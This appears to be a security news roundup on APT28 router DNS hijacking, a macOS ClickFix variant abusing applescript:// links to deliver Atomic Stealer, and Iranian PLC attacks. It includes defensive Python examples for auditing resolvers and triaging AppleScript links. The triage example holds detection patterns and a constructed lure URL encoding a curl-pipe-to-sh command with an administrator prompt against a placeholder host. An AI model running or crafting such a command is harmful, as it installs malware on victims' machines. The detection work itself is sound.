The U.S. Department of Justice has disrupted a large-scale DNS hijacking operation run by APT28, the group linked to Russia's GRU. The campaign compromised thousands of TP-Link routers and rewrote their DNS settings so that queries from hosts behind them were answered through GRU-controlled infrastructure, enabling the theft of credentials and sensitive data from government, military and critical infrastructure organisations. The FBI-led effort, 'Operation Masquerade', restored the devices' legitimate DNS settings and blocked further unauthorised access to them. Restoring the settings removes the redirect but not the weakness that allowed it, so owners of such routers still need to update firmware, replace default credentials and disable WAN-side management, and should verify that the resolver their hosts are handed is one they actually approved.
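The two checks a network team would run after a report like this, as an added example that is not part of the original article: first, is each host's configured resolver one the operator approved (a router that hands out an attacker's resolver via DHCP shows up here), and second, does the host's resolver give the same answer for a high-value name as a trusted out-of-band resolver. The approved-resolver set, the high-value name list, and every host, address and answer below are constructed for the example; the addresses come from the documentation ranges.

```python
"""Flag signs of router-level DNS hijacking from resolver observations.

Added example, not code from the article. Inputs are constructed.
"""
from dataclasses import dataclass
from typing import Optional
import ipaddress

# Assumption: the only resolvers the operator expects hosts to be handed.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# Names whose redirection yields credentials; a disagreement here is escalated.
HIGH_VALUE_NAMES = {"sso.example.gov", "mail.example.gov", "vpn.example.gov"}


@dataclass(frozen=True)
class Finding:
    host: str
    severity: str   # "high" or "low"
    kind: str       # "rogue-resolver" or "answer-mismatch"
    detail: str


def rogue_resolver(host: str, configured: str) -> Optional[Finding]:
    """Flag a host whose configured resolver is outside the approved set.
    A compromised router that pushes its own (or an attacker's) address via
    DHCP is caught here before any query is even redirected."""
    try:
        ipaddress.ip_address(configured)
    except ValueError:
        return Finding(host, "high", "rogue-resolver",
                       f"unparseable resolver {configured!r}")
    if configured in APPROVED_RESOLVERS:
        return None
    return Finding(host, "high", "rogue-resolver",
                   f"resolver {configured} not in approved set")


def answers_disagree(local: set, trusted: set) -> bool:
    """True only when the two answer sets share no address at all.
    CDN round-robin legitimately returns different subsets of one pool, so a
    partial overlap is treated as agreement to keep the check quiet."""
    return bool(local) and bool(trusted) and not (local & trusted)


def answer_mismatch(host: str, name: str, local: set, trusted: set) -> Optional[Finding]:
    """Compare the host-resolver answer with the trusted-resolver answer."""
    if not answers_disagree(local, trusted):
        return None
    severity = "high" if name in HIGH_VALUE_NAMES else "low"
    return Finding(host, severity, "answer-mismatch",
                   f"{name}: local={sorted(local)} trusted={sorted(trusted)}")


def audit(observations):
    """observations: dicts with keys host, resolver, name, local, trusted.
    Returns the list of findings in observation order."""
    findings = []
    seen = set()
    for obs in observations:
        key = (obs["host"], obs["resolver"])
        if key not in seen:              # report each host/resolver pair once
            seen.add(key)
            f = rogue_resolver(obs["host"], obs["resolver"])
            if f:
                findings.append(f)
        f = answer_mismatch(obs["host"], obs["name"],
                            set(obs["local"]), set(obs["trusted"]))
        if f:
            findings.append(f)
    return findings


# Constructed sample: ws-17 has been handed a resolver outside the approved set
# (203.0.113.7 is documentation space, standing in for attacker infrastructure)
# and that resolver answers the SSO name with an address the trusted resolver
# never returns. The www lookup differs only by round-robin and stays quiet.
SAMPLE = [
    {"host": "ws-17", "resolver": "203.0.113.7", "name": "sso.example.gov",
     "local": ["198.51.100.20"], "trusted": ["192.0.2.10", "192.0.2.11"]},
    {"host": "ws-17", "resolver": "203.0.113.7", "name": "www.example.org",
     "local": ["192.0.2.40", "192.0.2.41"], "trusted": ["192.0.2.41", "192.0.2.42"]},
    {"host": "ws-22", "resolver": "10.0.0.53", "name": "sso.example.gov",
     "local": ["192.0.2.10"], "trusted": ["192.0.2.10", "192.0.2.11"]},
]

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"[{f.severity}] {f.host} {f.kind}: {f.detail}")
```

In practice the `trusted` answers come from a resolver reached over a path the router cannot tamper with (DoH/DoT to a known server, or a resolver on a separate uplink); if the comparison resolver is itself behind the hijacked router, both sides agree and the check proves nothing.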
In the macOS ecosystem, researchers have identified a new variant of the 'ClickFix' social engineering attack that sidesteps Apple's latest Terminal-based mitigations. By using the applescript:// URL scheme, attackers pre-populate the macOS Script Editor with malicious code, so the victim only has to run what is already in front of them; the copy-paste step that the Terminal mitigations watch for never happens, and the chain delivers the Atomic Stealer (AMOS) malware. This evolution highlights the persistent cat-and-mouse game between OS security updates and malware delivery mechanisms: a control keyed to one delivery step is answered by moving the payload to a different handler.
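A triage helper for links of this kind, as an added example that is not from the article or any vendor's tooling. It assumes the Script Editor handler takes its text from a `script=` query parameter on an `applescript://com.apple.scripteditor?action=new&...` URL; the article only says the scheme pre-populates Script Editor, so that parameter layout is an assumption here. The URLs below, including the `example.invalid` host, are constructed for the example.

```python
"""Decode an applescript:// link and flag constructs typical of ClickFix lures.

Added example, not code from the article. The query-parameter layout of the
Script Editor URL handler is an assumption, not taken from the page.
"""
import re
from urllib.parse import urlsplit, parse_qs

# (pattern, label) pairs; matched case-insensitively against the decoded script.
SUSPICIOUS = [
    (r"do shell script", "shell execution from AppleScript"),
    (r"\bcurl\b|\bwget\b", "downloads a payload"),
    (r"base64\s+(-d|--decode)", "decodes an embedded payload"),
    (r"\bosascript\b", "nested osascript invocation"),
    (r"with administrator privileges", "requests elevation"),
    (r"xattr\s+-[a-z]*d", "strips quarantine attributes"),
    (r"chmod\s+\+x", "marks a downloaded file executable"),
]


def extract_script(url: str):
    """Return the decoded script text carried by an applescript:// URL, or
    None if the URL uses another scheme or carries no script parameter.
    parse_qs already percent-decodes, so the text is not decoded twice; a
    lure that double-encodes would need a second pass, which is deliberate
    here so the raw form is what gets logged."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "applescript":
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    values = query.get("script")
    if not values or not values[0]:
        return None
    return values[0]


def triage(url: str) -> dict:
    """Classify one URL: whether it targets Script Editor, the decoded script,
    and which suspicious constructs it contains."""
    script = extract_script(url)
    if script is None:
        return {"applescript": False, "script": None, "hits": []}
    hits = [label for pat, label in SUSPICIOUS
            if re.search(pat, script, re.IGNORECASE)]
    return {"applescript": True, "script": script, "hits": hits}


# Constructed lure: fetch-and-pipe-to-sh with an elevation prompt.
MALICIOUS_URL = (
    "applescript://com.apple.scripteditor?action=new&script="
    "do%20shell%20script%20%22curl%20-fsSL%20https%3A%2F%2Fexample.invalid%2Fx"
    "%20%7C%20sh%22%20with%20administrator%20privileges"
)
# Constructed benign link of the same shape.
BENIGN_URL = ("applescript://com.apple.scripteditor?action=new&script="
              "display%20dialog%20%22hello%22")

if __name__ == "__main__":
    for u in (MALICIOUS_URL, BENIGN_URL, "https://example.invalid/"):
        r = triage(u)
        print(r["applescript"], r["hits"], repr(r["script"]))
```

Run it over proxy or mail-gateway logs where URLs are recorded: any applescript:// link reaching a user is worth a look, and one that decodes to `do shell script` with a fetch-and-pipe is the ClickFix pattern regardless of which Terminal warning the user would otherwise have seen.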
Additionally, Iranian state-sponsored actors are targeting U.S. critical infrastructure by exploiting internet-facing programmable logic controllers (PLCs). The attacks have affected the energy, water and wastewater sectors, disrupting operations and falsifying the values operators see on their displays. The campaign uses legitimate OT configuration software to deploy remote access tools, so the tooling itself gives little to alert on; detection has to rest on where the connections originate and what the tools change. The immediate fix is the one the campaign keeps proving necessary: remove direct internet exposure from PLCs and their engineering interfaces, and reach them only through authenticated, monitored paths.